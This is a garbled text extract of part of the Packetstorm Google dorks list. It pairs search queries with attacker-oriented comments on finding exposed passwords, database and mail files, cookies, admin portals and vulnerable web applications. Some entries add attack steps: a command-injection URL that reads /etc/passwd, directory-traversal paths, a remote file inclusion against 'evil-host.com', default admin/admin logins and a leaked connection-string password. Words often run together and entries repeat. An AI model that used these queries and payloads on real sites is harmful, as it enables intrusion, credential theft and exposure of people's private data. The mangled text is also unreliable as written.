The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"Microsoft-IIS/5.0server at" "Microsoft-IIS/5.0 server at"

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"Microsoft-IIS/6.0"intitle:index.of

"Microsoft-IIS/6.0" intitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"OmniHTTPd/2.1 "OmniHTTPd/2.10" intitle:index.of The version of a particular web server

Page 63: Packetstorm Google Dorks List

0" intitle:index.of can be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"OpenSA/1.0.4"intitle:index.of "OpenSA/1.0.4" intitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"Red HatSecure/2.0" "Red Hat Secure/2.0"

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"Red HatSecure/3.0 serverat"

"Red Hat Secure/3.0 server at"

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

sEDWebserver *server +atintitle:index.of

sEDWebserver * server +atintitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

fitweb-wwws *server atintitle:index.of

fitweb-wwws * server atintitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers another

Page 64: Packetstorm Google Dorks List

layer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

"httpd+ssl/kttd" *server atintitle:index.of

"httpd+ssl/kttd" * server atintitle:index.of

The version of a particular web servercan be detected with a simple querylike this one. Although the same thingcan be accomplished by browsing theweb site, this method offers anotherlayer of anonymity. Armed with thisinformation an attacker can plan anattack with more precision.

Xerox Phaser 6250"Phaser 6250" "PrinterNeighborhood" "XEROXCORPORATION"

Base Specifications Phaser 6250N:Letter/Legal Size Color Printer 110V,26ppm Color/B&W (24ppm A4Color/B&W), 2400dpi, 700MHzProcessor, Ethernet, 256MB Memory,Photo Quality Mode, Network FeatureSetPassword not allways needed itseems, depends on admin setup..

"index of" /picasa.ini "index of" / picasa.ini

Picasa is an 'Automated Digital PhotoOrganizer' recently aquired by Google.This search allows the voyer to browsedirectories of photos uploaded usingthe picasa software.

"adding new user"inurl:addnewuser -"there are nodomains"

"adding new user" inurl:addnewuser-"there are no domains"

Allows an attacker to create an accounton a server running Argosoft mailserver pro for windows with unlimiteddisk quota (but a 5mb per messagelimit should you use your account tosend mail).

intitle:"index of"+myd size intitle:"index of" +myd size

The MySQL data directory usessubdirectories for each database andcommon files for table storage. Thesefiles have extensions like: .myd, .myior .frm. An attacker can copy thesefiles to his machine and using a toollike 'strings' possibly view the contentsof the database.

filetype:cnf my.cnf-cvs -example filetype:cnf my.cnf -cvs -example

The MySQL database system usesmy.cnf files for configuration. It caninclude a lot of information, rangingfrom pathes, databasenames up topasswords and usernames.Beware thissearch still gives false positives

Page 65: Packetstorm Google Dorks List

(examples, templates).

("Indexed.By"|"Monitored.By")hAcxFtpScan

("Indexed.By"|"Monitored.By")hAcxFtpScan

hAcxFtpScan - software that use 'l33th@x0rz' to monitor their file stroz onftp. On the ftp server usualy it is adirectorylike:/Monitored.By.hAcxFtpScan//Indexed.By.hAcxFtpScan/These are tagged,hacked, rooted and filled servers, inwich pplz from forums or irc channels(in most cases, usuasly private) sharefilez (yes yes p2p suxz)And againthnxz goo 4 help us to find it.

inurl:emailfiletype:mdb inurl:email filetype:mdb Microsoft Access databases containing

email information..

Powered byINDEXU

+"Powered by INDEXU"inurl:(browse|top_rated|power

From the sales department: "INDEXUis a portal solution software that allowsyou to build powerful Web IndexingSites such as yahoo.com, google.com,and dmoz.org with ease. It's ability toallow you and your members to easilyadd, organize, and manage your linksmakes INDEXU the first choice of allwebmasters."(Moderator note: don'tbelieve the marketing talk..)Some ofthese servers are not protected wellenough. It has been reported that on(rare) occosions this page ->http://[indexuserver]/recovery_tools/create_admin_user.phpindicates admin login ispossible by the appearance of three textlines:Create Administrator LoginDeleteold administrator user ....okCreate newadministrator user ....okAn attacker canthen change the URLtohttp://[target]/admin/index.php andenter:user=adminpass=adminBut that'sif you find them..

data filetype:mdb -site:gov -site:mil data filetype:mdb -site:gov -site:mil Microsoft Access databases containing

all kinds of 'data'.inurl:backupfiletype:mdb inurl:backup filetype:mdb Microsoft Access database backups..

inurl:forumfiletype:mdb inurl:forum filetype:mdb Microsoft Access databases containing

'forum' information ..

Page 66: Packetstorm Google Dorks List

intitle:"Index Of"cookies.txt size intitle:"Index Of" cookies.txt "size"

searches for cookies.txt file. OnMANY servers this file holds allcookie information, which may includeusernames, passwords, but also givesan attacker some juicy information onthis users surfing habits.

intext:(password |passcode)intext:(username |userid | user)filetype:csv

intext:(password | passcode)intext:(username | userid | user)filetype:csv

CSV formatted files containing all sortsof user/password combinations. Resultsmay vary, but are still interesting to thecasual attacker..

inurl:profilesfiletype:mdb inurl:profiles filetype:mdb Microsoft Access databases containing

(user) profiles ..

filetype:cgiinurl:"Web_Store.cgi"

filetype:cgi inurl:"Web_Store.cgi"

Zero X reported that "Web_Store.cgi"allows Command Execution:Thisapplication was written by Selena Soland Gunther Birznieks. You canexecuteshellcommands:http://[www.victim.com]/cgi-bin/web_store.cgi?page=.html|cat/etc/passwd|It is not know which version andhas not (yet) been confirmed by thegoogledork forum members. Thatmakes this search of limited use, but toan attacker it may be used as a startingpoint.

ASP.login_aspx"ASP.NET_SessionId"

ASP.login_aspx"ASP.NET_SessionId"

.NET based login pages serving thewhole environment and process tracefor your viewing pleasure.. These areoften found on test servers, just beforegoing online to the general public Iguess. If the current page has nodebugging information any longer, anattacker could still look at Google'scached version.

"ASP.NET_SessionId" "datasource="

"ASP.NET_SessionId" "datasource="

.NET pages revealing their datasourceand sometimes the authenticationcredentials with it. The complete debugline looks something like this forexample:strConn System.StringProvider=sqloledb;NetworkLibrary=DBMSSOCN;DataSource=ch-sql-91;Initial

Page 67: Packetstorm Google Dorks List

Catalog=DBLive;User Id=login-orsearch;Password=0aX(v5~di)>S$+*For quick fun an attacker could modifythis search to find those who useMicrosoft Access as their storage: Itwill not suprise the experiencedsecurity digger that these files are oftenin a downloadeble location on theserver.

"Novell, Inc"WEBACCESSUsernamePassword "Version*.*" Copyright -inurl:help -guides|guide

"Novell, Inc" WEBACCESSUsername Password "Version *.*"Copyright -inurl:help -guides|guide

This may be used to find NovellGrouwise Webaccess servers.

"# -FrontPage-"ext:pwdinurl:(service |authors |administrators |users) "# -FrontPage-"inurl:service.pwd

ext:pwd inurl:(service | authors |administrators | users) "# -FrontPage-"

Frontpage.. very nice clean searchresults listing !!No further commentsrequired..changelog:22 jan 2005:improved by vs1400 !

filetype:cgiinurl:"fileman.cgi" filetype:cgi inurl:"fileman.cgi"

This brings up alot of insecure as wellas secure filemanagers. These softwaresolutions are often used by companiesoffering a "simple" but "cost effective"way to their users who don't know unixor html. There is a problem sometimeswith this specific filemanager due toinsecure use of the session ID that canbe found in the unprotected"fileman.log" logfile. It has beenreported that an attacker can abuse thelast document-edit-url of the logfile.By copy pasting that line in a newwindow it gives the attacker valid usercredentials on the server, at least for awhile.. (think hours not seconds).

intitle:"Index Of" -inurl:maillogmaillog size

intitle:"Index Of" -inurl:maillogmaillog size

This google search reveals all maillogfiles within various directories on awebserver. This search brings back 872results to-date, all of which containvarious chunks of information (ie.

Page 68: Packetstorm Google Dorks List

Usernames, email adresses,Login/Logout times of users,IPAdresses, directories on the serverect. ect.)Someone, with thisinformation could dig up info on theserver before trying to penetrate it byfinding usernames, and email adressesof accounts on the server.

Canon Webviewnetcams intitle:liveapplet inurl:LvAppl

Canon has a series of netcams that alluse the "WebView LiveScope"software. They are frequently used byjapanese sites. Unfortunately most arecrawled by their IP address sodetermining their location becomesmore difficult. Some model namesare:* VB-C10* VB-101* VB-C50iThissearch looks for the java applet called"LiveApplet" that is used by Canon'snetwork camera feeds. There is also astandalone (free) program, that is easierto control and lets you save bookmarks.It's available for PC and MACs. Thewin32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi

inurl:"index.php?module=ew_filemanager"

inurl:"index.php?module=ew_filemanager"

http://www.cirt.net/advisories/ew_file_manager.shtml:Product: EasyWebFileManager Module -http://home.postnuke.ru/index.phpDescription: EasyWeb FileManager Modulefor PostNuke is vulnerable to adirectory traversal problem whichallows retrieval of arbitrary files fromthe remote system. Systems Affected:EasyWeb FileManager 1.0 RC-1Technical Description: The PostNukemodule works by loading a directoryand/or file via the "pathext" (directory)and "view" (file) variables. Providing arelative path (from the documentrepository) in the "pathext" variablewill cause FileManager to provide adirectory listing of that diretory.Selecting a file in that listing, orputting a file name in the "view"

Page 69: Packetstorm Google Dorks List

variable, will cause EasyWeb to loadthe file specified. Only files anddirectories which can be read by thesystem user running PHP can beretrieved.Assuming PostNuke isinstalled at the root level:/etc directorylisting:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/etc/passwdfile:/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwdFix/Workaround:Use another file managermodule for PostNuke, as the authors donot appear to bemaintaining EWFileManager.Vendor Status: Vendorwas contacted but did notrespond.Credir: Sullo - cirt.netNOTE:mitigating factor, an attacker needs tobe registred and logged on to haveaccess rights to this module.

allinurl:"index.php" "site=sglinks" allinurl:"index.php" "site=sglinks"

Easyins Stadtportal v4 is a GermanContent Management System for citiesand regions. Version 4 and prior seemsto be vulnerable to a code inclusion inindex.php. Bugtraq:http://www.securityfocus.com/bid/10795http://www.host-vulnerable.com/stadtportal-path/index.php?site=http://www.evil-host.com

"powered by""shoutstats" hourlydaily

"powered by" "shoutstats" hourlydaily

shoutstats is a fast, free Shoutcastserver statistic analysis program. Itproduces instant and dynamic usagereports in HTML format, for viewingin a standard browser. Shoutstats is abunch of php scripts and a RRDtooldatabase. It has been written under aDebianGNU/Linux.http://www.glop.org/projects/shoutstatsThis search can be used tofind Shoutcast servers.

intitle:"ShoutcastAdministrator" intitle:"Shoutcast Administrator"

shoutcast is software for streamingmp3 and such. This search finds theadministrator page. It can be used to

Page 70: Packetstorm Google Dorks List

detect unlisted Shoutcast servers.

inurl:"utilities/TreeView.asp" inurl:"utilities/TreeView.asp"

From the marketing brochure: "UltiProWorkforce Management offers you themost comprehensive and cost-effectiveHR and payroll solution on the markettoday."The default passwords are easyto guess if an employee has not loggedinto this system. An attacker wouldonly need to find the loginname.

filetype:pwl pwl filetype:pwl pwl

These are Windows Password List filesand have been known to be easy tocrack since the release of Windows 95.An attacker can use the PWLTools todecode them and get the userspasswords. The following example hasbeen provided:---Resource table: 02920294 0296 0298 (..etc..)File:C:\Downloads\2004-07\07-26\USER1.PWLUser name:'USER1'Password: ''Dial-up:'*Rna\Internet\PJIU_TAC'Password:'PJIUSCAC3000' ---

"apricot - admin"00h "apricot - admin" 00h

This search shows the webserveraccess stats as the user "admin". Thelanguage used is Japanese and thesearch includes the "00h" value whichis only shown when the admin islogged in.

filetype:ora ora filetype:ora ora

Greetings, The *.ora files areconfiguration files for oracle clients.An attacker can identify a oracledatabase this way and get more juicyinformation by searching for ora configfiles.This search can be modified to bemore specific:- filetype:ora sqlnet -filetype:ora names

filetype:wsdl wsdl filetype:wsdl wsdl

The XML headers are called *.wsdlfiles.they can include data, functions orobjects. An attacker with knowledge ofXML coding can sometimes do evilthings with this stuff.

filetype:inc incintext:setcookie filetype:inc inc intext:setcookie

Cookies are often used forauthentication and a lot of otherstuff.The "inc" php header files often

Page 71: Packetstorm Google Dorks List

include the exact syntax of the cookies.An attacker may create his own cookiewith the information he has taken fromthe header file and start cookiepoisining.

inurl:/wwwboard inurl:/wwwboard

The software wwwboard stores itspasswords in a file called"passwd.txt".An attacker may try tosearch forinurl:/wwwboardthen add a"passwd.txt" to it(../wwwboard/passwd.txt) and decryptdes DES passwords.

"allow_call_time_pass_reference""PATH_INFO"

"allow_call_time_pass_reference""PATH_INFO"

Returns publically visible pagesgenerated by the php functionphpinfo(). This search differs fromother phpinfo() searches in that itdoesn't depend on the filename beingcalled "phpinfo.php". Some result filesthat include phpinfo are:

inurl:*dbfiletype:mdb inurl:*db filetype:mdb

More Microsoft Access databases foryour viewing pleasure. Results mayvary, but there have been passwordsdiscovered with this search.

filetype:fp5 fp5 -site:gov -site:mil -"cvs log"

filetype:fp5 fp5 -site:gov -site:mil -"cvs log"

These are various kinds of FileMakerPro Databases (*.fp5 applies to bothversion 5 and 6).

inurl:gotoURL.asp?url= inurl:gotoURL.asp?url=

ASP Nuke is an open-source softwareapplication for running a community-based web site on a web server. Byopen-source, we mean the code isfreely available for others to read,modify and use in accordance with thesoftware license. The requirements forthe ASP Nuke content managementsystem are: 1. Microsoft SQL Server2000 and 2. Microsoft InternetInformation Server (IIS) 5.0(http://www.aspnuke.com/)On 30 Dec.2003 the hackers Cobac and Alnitakdiscovered a bug in Asp Nuke (version1.2, 1.3, and 1.4)Problem : the fileaddurl-inc.asp included in the filegotourl.asp does not sanitize the inputvars and make SQL injection

Page 72: Packetstorm Google Dorks List

possible.For a examples check theoriginal advisory posted to a spanishforum:http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&hl=en(link broken in twolines, glue them together first :-)Anattacker can obtain the user and adminpasswords by crafting a SQLstatement.

Phasers4500/6250/8200/8400

intext:centreware inurl:status

More Xerox printers (Phasers4500/6250/8200/8400). An attackercan access the webinterface with thissearch.

filetype:fp3 fp3 filetype:fp3 fp3 These are FileMaker Pro version 3Databases.

filetype:fp7 fp7 filetype:fp7 fp7 These are Filemaker Pro version 7databases files.

filetype:cfgauto_inst.cfg filetype:cfg auto_inst.cfg

Mandrake auto-install configurationfiles. These contain information aboutthe installed packages, networkingsetttings and even user accounts.

intitle:Node.ListWin32.Version.3.11

intitle:Node.ListWin32.Version.3.11

synchronet Bulletin Board SystemSoftware is a free software packagethat can turn your personal computerinto your own custom online servicesupporting multiple simultaneous userswith hierarchical message and fileareas, multi-user chat, and the ever-popular BBS door games.An attackercould use this search to find hosts withtelnet access. In some cases theusername may even be visible on thenode list page, thus leaving only thepassword to guess.

"powered byantiboard" "powered by antiboard"

"AntiBoard is a small and compactmulti-threaded bulletin board/messageboard system written in PHP. It useseither MySQL or PostgreSQL as thedatabase backend, and has support fordifferent languages. It is not meant asthe end all be all of bulletin boards, but

Page 73: Packetstorm Google Dorks List

rather something to easily integrate intoyour own page."There is an excellentvulnerability reportat:http://www.securiteam.com/unixfocus/5XP010ADPY.htmlVendorStatus:The vendor has been informedof the issues on the 28th July 2004,however no fix is planned in the nearfuture.

"AutoCreate=TRUE password=*" "AutoCreate=TRUE password=*"

This searches the password for"Website Access Analyzer", a Japanesesoftware that creates webstatistics. Forthose who can read Japanese, check outthe author's site at:http://www.coara.or.jp/~passy/Note:google to find the results of thissoftware.

intext:"d.aspx?id"|| inurl:"d.aspx?id"

intext:"d.aspx?id" ||inurl:"d.aspx?id"

"The YouSendIt team was formed totackle a common problem: securetransmission of large documents onlinewithout the use of clumsy clientsoftware, mail servers with limitedstorage space, and sharing passwords.By eliminating the size constraints andsecurity risks of sending files by email,YouSendIt has turned the mostcommon form of communication onthe Internet into the best method ofsecure document transimssion."Thissearch shows the files that weretransmitted. A malicious user coulddownload them from these pages. Thiscompany tends to hold the usersresponsible for content, while at thesame time exposing their pages toGoogle.. way to go guys..

filetype:pass passintext:userid filetype:pass pass intext:userid

Generally, these are dbman passwordfiles. They are not cleartext, but stillallow an attacker to harvest usernamesand optionally crack passwords offline.

inurl:/cgi-bin/sqwebmail?noframes=1

inurl:/cgi-bin/sqwebmail?noframes=1 sQWebmail login portals.

filetype:ini filetype:ini ServUDaemon The servU FTP Daemon ini file

Page 74: Packetstorm Google Dorks List

ServUDaemon contains setting and sessioninformation including usernames,passwords and more.

inurl:comersus_message.asp inurl:comersus_message.asp

About Comercus: "Comersus is anactive server pages software forrunning a professional store,seamlessly integrated with the rest ofyour web site. Comersus Cart is freeand it can be used for commercialpurposes. Full source code includedand compatible with Windows andLinux Servers."Comersus OpenTechnologies Comersus Cart hasMultiple Vulnerabilities:http://www.securityfocus.com/bid/10674/info/ This search finds the XSSvulnerable filecomersus_message.asp?message= ..Noversion info is included with thesearch. Not all results are vulnerable.

intitle:"teamspeakserver-administration

intitle:"teamspeak server-administration

TeamSpeak is an application whichallows its users to talk to each otherover the internet and basically wasdesigned to run in the background ofonline games. TeamSpeak uses awebadmin login portal to change serversettings remotely. Usually not an issue,however it might be when someone letsgoogle pick up their portal.

ext:pl inurl:cgiintitle:"FormMail*" -"*Referrer" -"*Denied" -sourceforge -error-cvs -input

ext:pl inurl:cgi intitle:"FormMail *"-"*Referrer" -"* Denied" -sourceforge -error -cvs -input

FormMail is a Perl script written byMatt Wright to send mail withsendmail from the cgi-gateway. Earlyversion didn' have a referer check. Newversions could be misconfigured.Spammers are known to hunt themdown (by means of cgi-scanning) andabuse them for their own evil purposesif the admin forgot to check thesettings.http://www.securityfocus.com/bid/3954/discussion/

(inurl:"robot.txt" |inurl:"robots.txt" )intext:disallowfiletype:txt

(inurl:"robot.txt" | inurl:"robots.txt") intext:disallow filetype:txt

Webmasters wanting to exclude searchengine robots from certain parts oftheir site often choose the use of arobot.txt file on the root of the server.This file basicly tells the bot which

Page 75: Packetstorm Google Dorks List

directories are supposed to be off-limits.An attacker can easily obtain thatinformation by very simply openingthat plain text file in his browser.Webmasters should *never* rely onthis for real security issues. Googlehelps the attacker by allowing a searchfor the "disallow" keyword.

intext:"SessionStart * * * *:*:* *"filetype:log

intext:"Session Start * * * *:*:* *"filetype:log

These are IRC and a few AIM log files.They may contain juicy info or justhours of good clean newbie bashingfun.

"WebSTAR Mail -Please Log In" "WebSTAR Mail - Please Log In"

@stake, Inc. advisory: "4D WebSTARis a software product that providesWeb, FTP, and Mail services for MacOS X. There are numerousvulnerabilities that allow for anattacker to escalate privileges or obtainaccess to protected resources."See also:http://www.securityfocus.com/archive/1/368778

Ultima Onlineloginservers filetype:cfg login "LoginServer=" This one finds login servers for the

Ultima Online game.

inurl:nukefiletype:sql inurl:nuke filetype:sql

This search reveals database dumpsthat most likely relate to the php-nukeor postnuke content managementsystems. These database dumps containusernames and (sometimes) encryptedpasswords for users of the system.

intitle:"pleaselogin" "yourpassword is *"

intitle:"please login" "yourpassword is *"

These administrators were friendlyenough to give hints about thepassword.

mail filetype:csv -site:govintext:name

mail filetype:csv -site:govintext:name

CSV Exported mail (user) names andsuch.

filetype:xls -site:govinurl:contact

filetype:xls -site:gov inurl:contact Microsoft Excel sheets containingcontact information.

intext:"Warning: *am able * write **configuration file""includes/configure.php" -Forums

intext:"Warning: * am able * write** configuration file""includes/configure.php" -Forums

OsCommerce has some security issues,including the following warningmessage: "Warning: I am able to writeto the configuration file". Additionalinformation on this can be found at

Page 76: Packetstorm Google Dorks List

http://www.fluxforums.com/showthread.php?p=14883#post14883With thissearch an attacker can find vulnerableOsCommerce servers and can build hisattack from there.

inurl:cgi-bin/ultimatebb.cgi?ubb=login

inurl:cgi-bin/ultimatebb.cgi?ubb=login

These are login pages for Infopop'smessage board UBB.classic. For theUBB.threads you can use this searchThis next search finds all UBB pageswith the infopop image and a link tothedevelopers.http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1

inurl:/db/main.mdb inurl:/db/main.mdb

ASP-Nuke database file containingpasswords.This search goes for thedirect location and has few results. Formore hits an attacker would try to findASP-Nuke sites another way (searchgoogledorks for them) and change theURL to the database location.

ext:aspinurl:pathto.asp ext:asp inurl:pathto.asp

The UBB trial version contains filesthat are not safe to keep online aftergoing live. The install files clearly stateso:CAUTIONS Do not leave pathto.aspor ubb6_test.cgi on your server. Deletethem from the server when you aredone. Leaving them in place poses asecurity risk."This searches pathto.aspfiles and allows an attacker to know theexact installed path of thesoftware.Examples:The path to yourSite is --g:\0E5\goldenstateeng.xxx\webThepath to your Site is --D:\inetpub\wwwroot\01xx738\mc10s9izz

"this proxy isworking fine!""enter *""URL***" * visit

"this proxy is working fine!" "enter*" "URL***" * visit

These are test pages for some proxyprogram. Some have a text field thatallows you to use that page as a proxy.The experts comment on this is thereare much better solutions for surfinganonymously.

Page 77: Packetstorm Google Dorks List

filetype:bakinurl:"htaccess|passwd|shadow|htusers"

filetype:bakinurl:"htaccess|passwd|shadow|htusers"

This will search for backup files(*.bak) created by some editors or evenby the administrator himself (beforeactivating a new version). Everyattacker knows that changing theextenstion of a file on a webserver canhave ugly consequences.

"http://*:*@www"domainname "http://*:*@www" bob:bob

This is a query to get inline passwordsfrom search engines (not just Google),you must type in the query followedwith the the domain name without the.com or .net"http://*:*@www" bangbusor "http://*:*@www"bangbusAnotherway is by justtyping"http://bob:bob@www"

filetype:log "PHPParse error" |"PHP Warning" |"PHP Error"

filetype:log "PHP Parse error" |"PHP Warning" | "PHP Error"

This search will show an attacker somePHP error logs wich may containinformation on wich an attack can bebased.

"powered byCuteNews""2003..2005CutePHP"

"powered by CuteNews""2003..2005 CutePHP"

This finds sites powered by variousCuteNews versions. An attacker usethis list and search the onlineadvisories for vulnerabilities. Forexample: "CuteNews HTML InjectionVulnerability Via Commentaries",Vulnerable Systems: * CuteNewsversion 1.3.x(http://www.securiteam.com/unixfocus/5BP0N20DFA.html)

intext:"404 ObjectNot Found"Microsoft-IIS/5.0

intext:"404 Object Not Found"Microsoft-IIS/5.0

This search finds IIS 5.0 error pages =IIS 5.0 Server

filetype:confoekakibbs filetype:conf oekakibbs

Oekakibss is a japanese anime creationapplication. The config file tells anattacker the encrypted password.

Novell NetWareintext:"netwaremanagement portalversion"

Novell NetWare intext:"netwaremanagement portal version"

Netware servers ( v5 and up ) use aweb-based management utility calledPortal services, which can be used toview files on a volume, view serverhealth statistics, etc. While you mustlog into the Portal Manager to view anyof the data, it will accept blankpasswords. So any Netware usernamedefined in the server's NDS database

Page 78: Packetstorm Google Dorks List

w/o a password can authenticate.Afterthe Google results are displayed, anattacker wil go to the company baseweb url and learn about employees,preferably their email addresses. Thenbounce to the portal management loginand try their username w/o a password.

Achievo webbasedprojectmanagement

inurl:"dispatch.php?atknodetype" |inurl:class.at

Achievo is a free web-based projectmanagement tool for business-environments. Achievo's is mainly usedfor its project management capabilities.According to the sitesecuritytracker.com remote codeexecution is possible by modifying acertain php script in this software suite.More information is available at:http://www.securitytracker.com/alerts/2002/Aug/1005121.html

intitle:"PHPExplorer" ext:php(inurl:phpexplorer.php | inurl:list.php| inurl:browse.php)

intitle:"PHP Explorer" ext:php(inurl:phpexplorer.php |inurl:list.php | inurl:browse.php)

This searches for PHP Explorer scripts.This looks like a file manager withsome nice extra options for an attacker,such as phpinfo, create/list directoriesand execute command shell. Not manyresults in this search and some onlycached. Over time this may prove to beinteresting if Google finds more (orsomeone finds a better search methodfor them).

"ftp://""www.eastgame.net"

"ftp://" "www.eastgame.net"Use this search to find eastgame.net ftpservers, loads of warez and that sort ofthing."thankyou4share" !

intitle:"ITSSystemInformation""Please log on tothe SAP System"

intitle:"ITS System Information""Please log on to the SAP System"

Frontend for SAP Internet TransactionServer webgui service.

LeapFTPintitle:"index.of./"sites.ini modified

LeapFTP intitle:"index.of./" sites.inimodified

The LeapFTP client configuration file"sites.ini" holds the login credentialsfor those sites in plain text. Thepasswords seems to be encrypted.

intitle:Login *Webmailer intitle:Login * Webmailer

1&1 Webmail login portals. This ismade by a german company calledInternet United active in the hostingproviders area. They have a server

Page 79: Packetstorm Google Dorks List

login product wich can be found byGooglingThis is all not very exiting asthere have been no vulnerabilitiesreported on this software yet.

inurl:"gs/adminlogin.aspx" inurl:"gs/adminlogin.aspx"

GradeSpeed seems to be a .NETapplication to administer school resultsfor several schools using the web. Ifyou do not select a school an error isreported. The HTML source codeshows path information, for example:optionvalue="E:\GRADESPEED\DRHARMONWKELLEYELEMENTARY\|Dr H.W K. E.|101">Dr ...

"phone * * *""address *" "e-mail"intitle:"curriculumvitae"

"phone * * *" "address *" "e-mail"intitle:"curriculum vitae"

This search gives hounderd of existingcurriculum vitae with names andadress. An attacker could steal identityif there is an SSN in the document.

intitle:Novellintitle:WebAccess"Copyright *-*Novell, Inc"

intitle:Novell intitle:WebAccess"Copyright *-* Novell, Inc"

search to show online NovellGroupwise web access portals.

intitle:phpMyAdmin "Welcome tophpMyAdmin***" "running on *as root@*"

intitle:phpMyAdmin "Welcome tophpMyAdmin ***" "running on *as root@*"

search for phpMyAdmin installationsthat are configured to run the MySQLdatabase with root priviledges.

"Powered byGallery v1.4.4" "Powered by Gallery v1.4.4"

http://www.securityfocus.com/bid/10968/discussion/"A vulnerability isreported to exist in Gallery that mayallow a remote attacker to executemalicious scripts on a vulnerablesystem. This issue is a design error thatoccurs due to the 'set_time_limit'function.The issue presents itselfbecause the 'set_time_limit' functionforces the application to wait for 30-seconds before the verification anddiscarding of non-image files takesplace. This allows for a window ofopportunity for an attacker to execute amalicious script on a server.Gallery1.4.4 is reported prone to this issue,

Page 80: Packetstorm Google Dorks List

however, other versions may beaffected as well. "

Quicken data files filetype:QDF QDF

The QDATA.QDF file (foundsometimes in zipped "QDATA"archives online, sometimes not)contains financial data, includingbanking accounts, credit card numbers,etc. This search has only a couple hitsso far, but this should be popular in thecoming year as Quicken 2005 makes itvery easy and suggests to backup yourdata online.

filetype:iniwcx_ftp filetype:ini wcx_ftp

This searches for Total commanderFTP passwords (encrypted) in a filecalled wcx_ftp.ini. Only 6 hits at themoment, but there may be more in thefuture.

4imagesAdministrationControl Panel

"4images Administration ControlPanel"

4images Gallery - 4images is a web-based image gallery managementsystem. The 4images administrationcontrol panel let you easily modifyyour galleries.

intitle:index.of/AlbumArt_ intitle:index.of /AlbumArt_

Directories containing commercialmusic.AlbumArt_{.*}.jpg aredownload/create by MS-WindowsMedia Player in music directory.

inurl:robpoll.cgifiletype:cgi inurl:robpoll.cgi filetype:cgi

robpoll.cgi is used to administratepolls.The default password used foradding polls is 'robpoll'. All of theresults should look something like this:"http://www.example.com/robpoll.cgi?start". An attacker may changerobpoll.cgi pointing to admin like this:"http://www.example.com/robpoll.cgi?admin".

( filetype:mail |filetype:eml |filetype:mbox |filetype:mbx )intext:password|subject

( filetype:mail | filetype:eml |filetype:mbox | filetype:mbx )intext:password|subject

storing emails in your webtree isnt agood idea.with this search google willshow files containing emails likemail,eml,mbox or mbx with thekeywords"password" or "subject" inthe mail data.

filetype:qbb qbb filetype:qbb qbbThis search will show QuickBooksBakup Files. Quickbook is financialaccounting software so storing these

Page 81: Packetstorm Google Dorks List

files in a webtree is not a smart idea.

filetype:bkf bkf filetype:bkf bkf

This search will show backupfiles forxp/2000 machines.Of course these filescould contain nearly everything,depending on the user selection andthey can also be password protected.

inurl:"plog/register.php" inurl:"plog/register.php"

pLog is a popular form of blogginsoftware. Currently there are estimatedabout 1450 sites running it. Theinstallation documents clearly warnabout removing files after installationfor security purposes:"If you are notplanning to allow internet users tocreate new blogs in this server, thenyou should also removeregister.php."This search finds thatregister.php form of course :)Below issome more general information aboutpLog.Vendor site:hxxp://www.plogworld.org/Adminportalshttp://sitename/plog/admin.phpInstallation wizard:http://sitename/plog/wizard.phpConfigfile (mysql db pass):http://sitename/plog/config/config.properties.phpTemp files:http://sitename/plog/tmp/Gallery files:http://sitename/plog/gallery/Blogsearch engine:http://www.plogworld.org/ploogle/

link:http://www.toastforums.com/ link:http://www.toastforums.com/

Toast Forums is an ASP message boardon the Internet. Toast Forums also hasall the features of an advanced messageboard (seehxxp://www.toastforums.com/). Theproblem is in the install documentation(quoting):-- start quote --2. Rename thedata.mdb file to a different name. Afterrenaming the data.mdb file, openconstants.asp and change thetstDBConnectString constant to reflectthe new name. -- end quote --Thissearch finds sites running Toast Forumby using the LINK: operator. Trial and

Page 82: Packetstorm Google Dorks List

error is needed to find the database filefrom the results by changing the URL.Member data can be found in the table"tstdb_Member". It looks like this:"ID""FName" "LName" "Username""Password" "Email" "HideEmail""ICQ" "Homepage" "Signature" "IP""Skin" "IncludeSignature""NotifyDefault" "PostCount""LastLoginDate""LastPostDate"Passwords areencrypted with the RC4 algoritm, so anattacker would find cracking them is(more) difficult (than usual).

snitz! forums dbpath error

databasetype. Code : 80004005.Error Description :

snitz forums uses a microsoft accessdatabases for storage and the defaultname is "Snitz_forums_2000.mdb".The installation recommends changingboth the name and the path. If only oneis changed this database error occurs.An attacker may use this informationas a hint to the location and thechanged name for the database, thusrendering the forum vulnerable tohostile downloads.

"Powered byIkonboard 3.1.1" "Powered by Ikonboard 3.1.1"

